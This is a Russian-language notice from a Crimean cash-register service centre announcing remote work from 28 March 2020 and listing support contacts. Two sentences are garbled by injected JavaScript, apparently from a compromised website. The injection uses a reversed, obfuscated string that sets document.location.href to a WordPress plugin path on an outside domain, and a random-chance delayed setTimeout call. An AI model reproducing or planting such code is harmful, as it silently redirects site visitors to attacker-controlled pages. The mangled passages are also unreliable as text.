С 28 марта работаем удаленно, офис закрыт

Уважаемые клиенты, в связи с toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dok.html»>введением на территории РК «режима повышенной готовности на территории Республики Крым», наш сервисный центр (toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc/4302401″>в качестве организации, осуществляющей неотложные ремонтные […] работы») с 28 марта переходит на дистанционную работу с клиентами, а техническая поддержка находящейся на обслуживании кассовой техники будет продолжаться средствами удаленного доступа и телефонными консультациями.

Клиенты, у которых есть действующий (оплаченный до конца марта 2020г) договор на техническую поддержку ККТ (или сопровождения программного обеспечения), в случае возникновения каких-либо трудностей при эксплуатации техники или ПО, могут звонить закрепленному за их техникой инженеру напрямую, либо воспользоваться резервными контактами горячей линии. Ремонтные и прочие работы с техникой, на которую нет действующего договора техподдержки, приостанавливается до отмены введенных ограничений на работу мастерской.

Уточнить контакты своего техника, а так же обращаться по всем прочим вопросам (в том числе по вопросам заказа товара) можно по телефонам: +7(978) 877-91-02, +7(978) 877-91-03 или e-mail info@veskacrimea.ru